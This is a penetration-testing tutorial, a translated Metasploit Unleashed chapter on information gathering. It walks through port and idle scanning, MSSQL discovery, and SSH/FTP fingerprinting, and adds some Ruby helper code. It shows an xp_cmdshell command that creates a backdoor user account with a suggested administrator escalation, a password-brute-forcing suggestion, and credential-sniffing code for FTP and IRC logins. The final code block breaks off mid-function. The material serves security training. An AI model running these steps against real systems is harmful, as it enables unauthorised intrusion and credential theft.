Translator's note 1: This is a Chinese translation of Metasploit Unleashed. Original: https://www.offensive-security.com/metasploit-unleashed/
Translator's note 2: To lighten the workload, machine translation was used and the translator manually removed mistranslations and ambiguities, but small problems may remain. If you find a translation error, please leave a comment below the article.
V. Information Gathering
The foundation of any successful penetration test is solid reconnaissance. Failing to perform proper information gathering will have you flailing around at random, attacking machines that are not vulnerable and missing others that are.
We will cover some of these information gathering techniques, such as:
- Port scanning
- Hunting for MSSQL
- Service identification
- Password sniffing
- SNMP sweeping
1. Port Scanning
Scanners and most other auxiliary modules use the "RHOSTS" option instead of "RHOST". RHOSTS can take an IP range (192.168.1.20-192.168.1.30), a CIDR range (192.168.1.0/24), multiple ranges separated by commas (192.168.1.0/24, 192.168.3.0/24), or a line-separated host list file (file:/tmp/hostlist.txt). This is yet another use for our grepable Nmap output file.
By default, all scanner modules have the "THREADS" value set to "1". The "THREADS" value sets the number of concurrent threads to use while scanning. Set this value to a higher number to speed up your scans, or keep it low to reduce network traffic, but be sure to follow these guidelines:
- Keep the THREADS value under 16 on native Win32 systems
- Keep THREADS under 200 when running MSF under Cygwin
- On Unix-like operating systems, THREADS can be set as high as 256
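To make the four RHOSTS forms above concrete, here is a small expander added as an example (it is not Metasploit's own RHOSTS parsing code): it turns a specification in any of those forms into the list of individual addresses a scanner module would visit. The module name RhostsExpander and the sample specifications are chosen for this example; IPv6 is out of scope.

```ruby
require 'ipaddr'
require 'socket'

# Expands an RHOSTS-style target specification into individual IPv4 addresses.
# Supports the four forms described in the text: an address range, a CIDR
# block, several of those separated by commas, and "file:<path>" holding one
# host per line.
module RhostsExpander
  # Expand one token: "a.b.c.d-e.f.g.h", "a.b.c.d/nn", or a single address.
  def self.expand_token(token)
    token = token.strip
    return [] if token.empty?
    if token.include?('-')
      first, last = token.split('-', 2).map { |s| IPAddr.new(s.strip) }
      raise ArgumentError, "range end precedes start: #{token}" if last < first
      (first.to_i..last.to_i).map { |i| IPAddr.new(i, Socket::AF_INET).to_s }
    elsif token.include?('/')
      IPAddr.new(token).to_range.map(&:to_s)
    else
      [IPAddr.new(token).to_s]
    end
  end

  # Expand a complete RHOSTS value. "file:" reads hosts from a file, skipping
  # blank lines and "#" comments; anything else is split on commas. Duplicates
  # from overlapping ranges are dropped so a host is not scanned twice.
  def self.expand(spec)
    tokens =
      if spec.start_with?('file:')
        File.readlines(spec.delete_prefix('file:'), chomp: true)
            .map(&:strip).reject { |l| l.empty? || l.start_with?('#') }
      else
        spec.split(',')
      end
    tokens.flat_map { |t| expand_token(t) }.uniq
  end
end

# Constructed specification mixing the range and CIDR forms, as a self-check.
if __FILE__ == $PROGRAM_NAME
  puts RhostsExpander.expand('192.168.1.20-192.168.1.22,192.168.3.0/30').inspect
end
```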
1) Nmap and db_nmap
We can use the db_nmap command to run Nmap against our targets and have the scan results stored automatically in our database. However, if you also wish to import the scan results into another application or framework later on, you may want to export the results in XML format. It is always nice to have all three Nmap outputs (xml, grepable, and normal). So we can run Nmap with the -oA flag followed by the desired filename to generate the three output files, then issue the db_import command to populate the Metasploit database.
Run Nmap with the options you would normally use from the command line. If we wished to save the scan to the database, we would omit the output flag and use db_nmap. The example below would then be db_nmap -v -sV 192.168.1.0/24.
msf > nmap -v -sV 192.168.1.0/24 -oA subnet_1
[*] exec: nmap -v -sV 192.168.1.0/24 -oA subnet_1
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-13 19:29 MDT
NSE: Loaded 3 scripts for scanning.
Initiating ARP Ping Scan at 19:29
Scanning 101 hosts [1 port/host]
...
Nmap done: 256 IP addresses (16 hosts up) scanned in 499.41 seconds
Raw packets sent: 19973 (877.822KB) | Rcvd: 15125 (609.512KB)
2) The portscan Modules
In addition to running Nmap, there are a variety of other port scanners available to us within the framework.
msf > search portscan
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
For comparison, we will compare our Nmap scan results for port 80 with a Metasploit scanning module. First, let's determine which hosts had port 80 open according to Nmap.
msf > cat subnet_1.gnmap | grep 80/open | awk '{print $2}'
[*] exec: cat subnet_1.gnmap | grep 80/open | awk '{print $2}'
192.168.1.1
192.168.1.2
192.168.1.10
192.168.1.109
192.168.1.116
192.168.1.150
The Nmap scan we ran earlier was a SYN scan, so we will run the same scan across the subnet with Metasploit, looking for port 80 through the eth0 interface.
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
DELAY 0 yes The delay between connections, per thread, in milliseconds
INTERFACE no The name of the interface
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > set INTERFACE eth0
INTERFACE => eth0
msf auxiliary(syn) > set PORTS 80
PORTS => 80
msf auxiliary(syn) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(syn) > set THREADS 50
THREADS => 50
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.1.1:80
[*] TCP OPEN 192.168.1.2:80
[*] TCP OPEN 192.168.1.10:80
[*] TCP OPEN 192.168.1.109:80
[*] TCP OPEN 192.168.1.116:80
[*] TCP OPEN 192.168.1.150:80
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
Here we will load the "tcp" scanner and use it against another target. As with all the plugins mentioned earlier, this uses the "RHOSTS" option. Remember that we can issue the hosts -R command to set this option automatically with the hosts in our database.
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf auxiliary(tcp) > hosts -R
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.194.172 00:0C:29:D1:62:80 Linux Ubuntu server
RHOSTS => 172.16.194.172
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-1024 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 172.16.194.172 yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 10 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf auxiliary(tcp) > run
[*] 172.16.194.172:25 - TCP OPEN
[*] 172.16.194.172:23 - TCP OPEN
[*] 172.16.194.172:22 - TCP OPEN
[*] 172.16.194.172:21 - TCP OPEN
[*] 172.16.194.172:53 - TCP OPEN
[*] 172.16.194.172:80 - TCP OPEN
[*] 172.16.194.172:111 - TCP OPEN
[*] 172.16.194.172:139 - TCP OPEN
[*] 172.16.194.172:445 - TCP OPEN
[*] 172.16.194.172:514 - TCP OPEN
[*] 172.16.194.172:513 - TCP OPEN
[*] 172.16.194.172:512 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >
We can see that Metasploit's built-in scanner modules are more than capable of finding systems and open ports for us. It is just another excellent tool to have in your arsenal if you happen to be running Metasploit on a system without Nmap installed.
3) SMB Version Scanning
Now that we have determined which hosts are available on the network, we can attempt to determine the operating systems they are running. This will help us narrow down our attacks to target specific systems and stop us from wasting time on systems that are not vulnerable to a particular exploit.
Since there are many systems in our scan that have port 445 open, we will use the scanner/smb/version module to determine which version of Windows is running on a target and which Samba version is on the Linux hosts.
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.1.200-210
RHOSTS => 192.168.1.200-210
msf auxiliary(smb_version) > set THREADS 11
THREADS => 11
msf auxiliary(smb_version) > run
[*] 192.168.1.209:445 is running Windows 2003 R2 Service Pack 2 (language: Unknown) (name:XEN-2K3-FUZZ) (domain:WORKGROUP)
[*] 192.168.1.201:445 is running Windows XP Service Pack 3 (language: English) (name:V-XP-EXPLOIT) (domain:WORKGROUP)
[*] 192.168.1.202:445 is running Windows XP Service Pack 3 (language: English) (name:V-XP-DEBUG) (domain:WORKGROUP)
[*] Scanned 04 of 11 hosts (036% complete)
[*] Scanned 09 of 11 hosts (081% complete)
[*] Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
Also notice that if we issue the hosts command now, the newly acquired information is stored in Metasploit's database.
msf auxiliary(smb_version) > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.201 Microsoft Windows XP SP3 client
192.168.1.202 Microsoft Windows XP SP3 client
192.168.1.209 Microsoft Windows 2003 R2 SP2 server
4) Idle Scanning
Nmap's IPID idle scan allows us to be a little stealthy when scanning a target while spoofing the IP address of another host on the network. For this type of scan to work, we need to locate a host that is idle on the network and uses an IPID sequence that is either incremental or broken little-endian incremental. Metasploit contains the module scanner/ip/ipidseq to scan for and find hosts that meet these requirements.
More information on Nmap idle scanning can be found in the free online Nmap book.
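To make the sequence classes the module reports concrete, here is a small classifier added as an example (it is not Metasploit's ipidseq code): it takes the IP ID values observed in consecutive replies from one host and assigns the same class labels the scan output uses. The module name IpidSeq and the numeric thresholds are assumptions chosen for this example, not copied from the module.

```ruby
# Classifies a host's IP ID sequence the way an idle-scan zombie hunter does.
# Class names mirror the scanner's output; thresholds are chosen here.
module IpidSeq
  # ipids: IP ID values read from consecutive replies to our probes.
  def self.classify(ipids)
    return 'Unknown' if ipids.length < 2
    return 'All zeros' if ipids.all?(&:zero?)
    return 'Constant' if ipids.uniq.length == 1

    # Differences between successive IDs, wrapping at the 16-bit field width.
    diffs = ipids.each_cons(2).map { |a, b| (b - a) & 0xFFFF }
    # Byte-swapped view: some stacks emit the counter in little-endian order,
    # which looks random until the bytes are swapped back.
    swapped = ipids.map { |id| ((id & 0xFF) << 8) | (id >> 8) }
    sdiffs = swapped.each_cons(2).map { |a, b| (b - a) & 0xFFFF }

    return 'Incremental!' if diffs.all? { |d| d.between?(1, 5) }
    return 'Broken little-endian incremental!' if sdiffs.all? { |d| d.between?(1, 5) }
    return 'Random positive increments' if diffs.all? { |d| d.between?(1, 999) }
    'Randomized'
  end

  # A usable zombie is idle (tiny increments) and predictable; from the
  # defender's side, these are the hosts whose IP ID generation should be fixed.
  def self.zombie_candidate?(ipids)
    ['Incremental!', 'Broken little-endian incremental!'].include?(classify(ipids))
  end
end

# Constructed samples for a quick self-check.
if __FILE__ == $PROGRAM_NAME
  puts IpidSeq.classify([100, 101, 102, 103])
  puts IpidSeq.classify([1, 40_000, 7, 65_000])
end
```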
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) > show options
Module options (auxiliary/scanner/ip/ipidseq):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(ipidseq) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(ipidseq) > set THREADS 50
THREADS => 50
msf auxiliary(ipidseq) > run
[*] 192.168.1.1's IPID sequence class: All zeros
[*] 192.168.1.2's IPID sequence class: Incremental!
[*] 192.168.1.10's IPID sequence class: Incremental!
[*] 192.168.1.104's IPID sequence class: Randomized
[*] 192.168.1.109's IPID sequence class: Incremental!
[*] 192.168.1.111's IPID sequence class: Incremental!
[*] 192.168.1.114's IPID sequence class: Incremental!
[*] 192.168.1.116's IPID sequence class: All zeros
[*] 192.168.1.124's IPID sequence class: Incremental!
[*] 192.168.1.123's IPID sequence class: Incremental!
[*] 192.168.1.137's IPID sequence class: All zeros
[*] 192.168.1.150's IPID sequence class: All zeros
[*] 192.168.1.151's IPID sequence class: Incremental!
[*] Auxiliary module execution completed
Judging from the results of our scan, we have a number of potential zombies we can use to perform idle scanning. We will try scanning a host using the zombie at 192.168.1.109 and see if we get the same results we had earlier.
msf auxiliary(ipidseq) > nmap -Pn -sI 192.168.1.109 192.168.1.114
[*] exec: nmap -Pn -sI 192.168.1.109 192.168.1.114
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-14 05:51 MDT
Idle scan using zombie 192.168.1.109 (192.168.1.109:80); Class: Incremental
Interesting ports on 192.168.1.114:
Not shown: 996 closed|filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-term-serv
MAC Address: 00:0C:29:41:F2:E8 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.56 seconds
2. Hunting for Vulnerable MSSQL
Using UDP footprinting, we can search for and locate MSSQL installations inside an internal network. When MSSQL installs, it listens either on TCP port 1433 or on a randomized dynamic TCP port. If the port is dynamically assigned, querying UDP port 1434 will provide us with information about the server, including the TCP port the service is listening on.
Let's search for and load the MSSQL ping module inside msfconsole.
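The UDP/1434 answer that the ping module reads is an SQL Server Resolution Protocol (SSRP) reply: one byte 0x05, a little-endian 16-bit length, then an ASCII string of "key;value" pairs with each instance record terminated by ";;". The parser below is added here as an example (it is not Metasploit's mssql_ping code); the module name Ssrp is chosen for this example, and SAMPLE_REPLY is a constructed packet built from the field values shown in the scan output later on this page.

```ruby
# Parses an SSRP (MS-SQLR) server response from UDP/1434 into per-instance
# hashes, so an inventory tool can record which TCP port each instance uses.
module Ssrp
  SVR_RESP = 0x05 # first byte of every server response

  # Parse the raw UDP payload into an array of instance hashes.
  def self.parse_response(payload)
    raise ArgumentError, 'short packet' if payload.bytesize < 3
    raise ArgumentError, 'not an SVR_RESP packet' unless payload.getbyte(0) == SVR_RESP
    declared = payload.byteslice(1, 2).unpack1('v')        # uint16, little-endian
    body = payload.byteslice(3, declared)
    raise ArgumentError, 'truncated packet' if body.nil? || body.bytesize < declared
    # Each instance record ends with ";;"; a reply may list several instances.
    body.split(';;').reject(&:empty?).map { |rec| parse_instance(rec) }
  end

  # Split one "k;v;k;v" record into a hash, keeping values verbatim.
  def self.parse_instance(record)
    fields = record.split(';', -1)
    raise ArgumentError, 'odd number of fields in instance record' if fields.length.odd?
    fields.each_slice(2).to_h
  end

  # The TCP port an instance advertises, or nil when only named pipes are exposed.
  def self.tcp_port(instance)
    instance['tcp']&.to_i
  end
end

# Constructed sample reply; field values mirror the mssql_ping output on this page.
SAMPLE_REPLY = begin
  body = 'ServerName;SSHACKTHISBOX-0;InstanceName;MSSQLSERVER;IsClustered;No;' \
         'Version;8.00.194;tcp;1433;np;\\\\SSHACKTHISBOX-0\\pipe\\sql\\query;;'
  [Ssrp::SVR_RESP, body.bytesize].pack('Cv') + body
end

if __FILE__ == $PROGRAM_NAME
  Ssrp.parse_response(SAMPLE_REPLY).each do |inst|
    puts "#{inst['ServerName']}\\#{inst['InstanceName']} tcp=#{Ssrp.tcp_port(inst)} version=#{inst['Version']}"
  end
end
```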
msf > search mssql
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/mssql/mssql_enum normal Microsoft SQL Server Configuration Enumerator
auxiliary/admin/mssql/mssql_enum_domain_accounts normal Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli normal Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
auxiliary/admin/mssql/mssql_enum_sql_logins normal Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
auxiliary/admin/mssql/mssql_escalate_dbowner normal Microsoft SQL Server Escalate Db_Owner
auxiliary/admin/mssql/mssql_escalate_dbowner_sqli normal Microsoft SQL Server SQLi Escalate Db_Owner
auxiliary/admin/mssql/mssql_escalate_execute_as normal Microsoft SQL Server Escalate EXECUTE AS
auxiliary/admin/mssql/mssql_escalate_execute_as_sqli normal Microsoft SQL Server SQLi Escalate Execute AS
auxiliary/admin/mssql/mssql_exec normal Microsoft SQL Server xp_cmdshell Command Execution
auxiliary/admin/mssql/mssql_findandsampledata normal Microsoft SQL Server Find and Sample Data
auxiliary/admin/mssql/mssql_idf normal Microsoft SQL Server Interesting Data Finder
auxiliary/admin/mssql/mssql_ntlm_stealer normal Microsoft SQL Server NTLM Stealer
auxiliary/admin/mssql/mssql_ntlm_stealer_sqli normal Microsoft SQL Server SQLi NTLM Stealer
auxiliary/admin/mssql/mssql_sql normal Microsoft SQL Server Generic Query
auxiliary/admin/mssql/mssql_sql_file normal Microsoft SQL Server Generic Query from File
auxiliary/analyze/jtr_mssql_fast normal John the Ripper MS SQL Password Cracker (Fast Mode)
auxiliary/gather/lansweeper_collector normal Lansweeper Credential Collector
auxiliary/scanner/mssql/mssql_hashdump normal MSSQL Password Hashdump
auxiliary/scanner/mssql/mssql_login normal MSSQL Login Utility
auxiliary/scanner/mssql/mssql_ping normal MSSQL Ping Utility
auxiliary/scanner/mssql/mssql_schemadump normal MSSQL Schema Dump
auxiliary/server/capture/mssql normal Authentication Capture: MSSQL
exploit/windows/iis/msadc 1998-07-17 excellent MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
exploit/windows/mssql/lyris_listmanager_weak_pass 2005-12-08 excellent Lyris ListManager MSDE Weak sa Password
exploit/windows/mssql/ms02_039_slammer 2002-07-24 good MS02-039 Microsoft SQL Server Resolution Overflow
exploit/windows/mssql/ms02_056_hello 2002-08-05 good MS02-056 Microsoft SQL Server Hello Overflow
exploit/windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption
exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
exploit/windows/mssql/mssql_clr_payload 1999-01-01 excellent Microsoft SQL Server Clr Stored Procedure Payload Execution
exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great Microsoft SQL Server Database Link Crawling Command Execution
exploit/windows/mssql/mssql_payload 2000-05-30 excellent Microsoft SQL Server Payload Execution
exploit/windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL Injection
post/windows/gather/credentials/mssql_local_hashdump normal Windows Gather Local SQL Server Hash Dump
post/windows/manage/mssql_local_auth_bypass normal Windows Manage Local Microsoft SQL Server Authorization Bypass
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options
Module options (auxiliary/scanner/mssql/mssql_ping):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
msf auxiliary(mssql_ping) > set RHOSTS 10.211.55.1/24
RHOSTS => 10.211.55.1/24
msf auxiliary(mssql_ping) > exploit
[*] SQL Server information for 10.211.55.128:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed
The first command we issued was to search for any mssql plugins. The second set of instructions was use scanner/mssql/mssql_ping, which loads the scanner module for us.
Next, show options allows us to see what we need to specify. set RHOSTS 10.211.55.1/24 sets the subnet range in which we want to start looking for SQL servers. You could specify a /16 or whatever you want to go after. We recommend increasing the number of threads, as scanning with a single thread can take a long time.
After the run command is issued, the scan is executed and pulls back specific information about the MSSQL server. As we can see, the name of the machine is "SSHACKTHISBOX-0" and the TCP port is running on 1433.
At this point, you could use the scanner/mssql/mssql_login module to brute-force the password by passing the module a dictionary file. Alternatively, you could also use medusa or THC-Hydra to do this. Once you successfully guess the password, there is a neat little module for executing the xp_cmdshell stored procedure.
msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > show options
Module options (auxiliary/admin/mssql/mssql_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD cmd.exe /c echo OWNED > C:\owned.exe no Command to execute
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
msf auxiliary(mssql_exec) > set RHOST 10.211.55.128
RHOST => 10.211.55.128
msf auxiliary(mssql_exec) > set MSSQL_PASS password
MSSQL_PASS => password
msf auxiliary(mssql_exec) > set CMD net user bacon ihazpassword /ADD
cmd => net user bacon ihazpassword /ADD
msf auxiliary(mssql_exec) > exploit
The command completed successfully.
[*] Auxiliary module execution completed
Looking at the output of "net user bacon ihazpassword /ADD", we have successfully added a user account named "bacon", from where we could issue net localgroup administrators bacon /ADD to get local administrator on the system itself. At this point, we have full control of the system.
3. Service Identification
Again, besides using Nmap to perform service scans on our target network, Metasploit also includes a variety of scanners for various services, which can often help you determine potentially vulnerable running services on target machines.
1) SSH Service
Our earlier scans showed that we have TCP port 22 open on two machines. SSH is very secure, but vulnerabilities are not unheard of, and it always pays to gather as much information as possible from your targets.
msf > services -p 22 -c name,port,proto
Services
========
host name port proto
---- ---- ---- -----
172.16.194.163 ssh 22 tcp
172.16.194.172 ssh 22 tcp
We will load auxiliary/scanner/ssh/ssh_version and issue the set command to set the "RHOSTS" option. From there, we can run the module by simply typing run.
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 172.16.194.163 172.16.194.172
RHOSTS => 172.16.194.163 172.16.194.172
msf auxiliary(ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.194.163 172.16.194.172 yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the SSH probe
msf auxiliary(ssh_version) > run
[*] 172.16.194.163:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7
[*] Scanned 1 of 2 hosts (050% complete)
[*] 172.16.194.172:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
2) FTP Service
A poorly configured FTP server can frequently be the foothold you need to gain access to an entire network, so it always pays to check whether anonymous access is allowed whenever you encounter an open FTP port, usually on TCP port 21. We set "THREADS" to "1" here because we are only going to scan 1 host.
msf > services -p 21 -c name,proto
Services
========
host name proto
---- ---- -----
172.16.194.172 ftp tcp
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 172.16.194.172
RHOSTS => 172.16.194.172
msf auxiliary(anonymous) > show options
Module options (auxiliary/scanner/ftp/anonymous):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS 172.16.194.172 yes The target address range or CIDR identifier
RPORT 21 yes The target port
THREADS 1 yes The number of concurrent threads
msf auxiliary(anonymous) > run
[*] 172.16.194.172:21 Anonymous READ (220 (vsFTPd 2.3.4))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
In a short amount of time and with very little work, we have been able to acquire a great deal of information about the hosts residing on our network, giving us a much better picture of what we are up against when conducting our penetration test.
Obviously, there are far too many scanners for us to show them all. It is clear, however, that the Metasploit Framework is well suited for all your scanning and identification needs.
msf > use auxiliary/scanner/
Display all 485 possibilities? (y or n)
...snip...
4. Password Sniffing
Max Moser released a Metasploit password sniffing module named psnuffle, which will sniff passwords off the wire similar to the tool dsniff. It currently supports POP3, IMAP, FTP, and HTTP GET. More information is available on his blog.
Using the psnuffle module is extremely simple. There are some options available, but the module works great "out of the box".
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PROTOCOLS all yes A comma-delimited list of protocols to sniff or "all".
SNAPLEN 65535 yes The number of bytes to capture
TIMEOUT 1 yes The number of seconds to wait for new data
There are some options available, including the ability to import a pcap capture file. We will run the psnuffle scanner in its default mode.
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Successful FTP Login: 192.168.1.100:21-192.168.1.5:48614 >> victim / pass (220 3Com 3CDaemon FTP Server Version 2.0)
There! We captured a successful FTP login. This is an excellent tool for passive information gathering.
1) Extending psnuffle
a) Extending psnuffle to sniff other protocols
Psnuffle is easy to extend thanks to its modular design. This section will guide you through the process of developing an IRC (Internet Relay Chat) protocol sniffer (Notify and Nick messages).
b) Module location
All the different modules are located in data/exploits/psnuffle. The names correspond to the protocol names used inside psnuffle. To develop our own module, we take a look at the important parts of the existing pop3 sniffer module as a template.
self.sigs = {
  :ok   => /^(\+OK[^\n]*)\n/si,
  :err  => /^(\-ERR[^\n]*)\n/si,
  :user => /^USER\s+([^\n]+)\n/si,
  :pass => /^PASS\s+([^\n]+)\n/si,
  :quit => /^(QUIT\s*[^\n]*)\n/si
}
This section defines the expression patterns which will be used during sniffing to identify interesting data. Regular expressions look very strange at first, but are very powerful. In short, everything within () will be available later within a variable in the script.
c) Defining our own psnuffle module
self.sigs = {
  :user => /^(NICK\s+[^\n]+)/si,
  :pass => /\b(IDENTIFY\s+[^\n]+)/si
}
For IRC this section would look like the one above. Not all nickname servers use IDENTIFY to send passwords, but the one on Freenode does.
d) Session definition
For every module we first have to define what ports it should handle and how sessions are tracked.
return if not pkt[:tcp] # We don't want to handle anything other than tcp
return if (pkt[:tcp].src_port != 6667 and pkt[:tcp].dst_port != 6667) # Process only packets on port 6667
# Ensure that the session hash stays the same for both directions of communication
if (pkt[:tcp].dst_port == 6667) # When packet is sent to server
  s = find_session("#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}")
else # When packet is coming from the server
  s = find_session("#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}-#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}")
end
Now we have a session object that uniquely merges the information, and we can go on with processing packet contents that matched one of the regular expressions we defined earlier.
case matched
when :user # when the pattern "/^(NICK\s+[^\n]+)/si" is matching the packet content
  s[:user] = matches # Store the name into the session hash s for later use
  # Do whatever you like here... maybe a puts if you need to
when :pass # When the pattern "/\b(IDENTIFY\s+[^\n]+)/si" is matching
  s[:pass] = matches # Store the password into the session hash s as well
  if (s[:user] and s[:pass]) # When we have the name and the pass sniffed, print it
    print "-> IRC login sniffed: #{s[:session]} >> username:#{s[:user]} password:#{s[:pass]}\n"
  end
  sessions.delete(s[:session]) # Remove this session because we don't need to track it anymore
when nil
  # No matches, don't do anything
else # Just in case anything else is matching...
  sessions[s[:session]].merge!({k => matches}) # Just add it to the session object (k is the matched signature key)
end
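To see the three pieces above (the signatures, the direction-independent session key, and the match loop) working together without Metasploit or a live capture, here is a stand-alone model added as an example; it is not psnuffle's own code. Packet, IrcSniffer, the addresses and the credentials in SAMPLE_PACKETS are constructed for this example, and the regexes use only the i flag.

```ruby
# Minimal model of the psnuffle IRC sniffer logic, run over constructed packets.
Packet = Struct.new(:src_ip, :src_port, :dst_ip, :dst_port, :payload)

class IrcSniffer
  IRC_PORT = 6667
  # Same patterns as the module: the captured group keeps the command word.
  SIGS = {
    user: /^(NICK\s+[^\n]+)/i,
    pass: /\b(IDENTIFY\s+[^\n]+)/i
  }.freeze

  attr_reader :sessions, :logins

  def initialize
    @sessions = {} # session key => hash of fields sniffed so far
    @logins = []   # completed [session, user, pass] triples
  end

  # Same key whichever direction the packet travels: "server:port-client:port".
  def session_key(pkt)
    if pkt.dst_port == IRC_PORT
      "#{pkt.dst_ip}:#{pkt.dst_port}-#{pkt.src_ip}:#{pkt.src_port}"
    else
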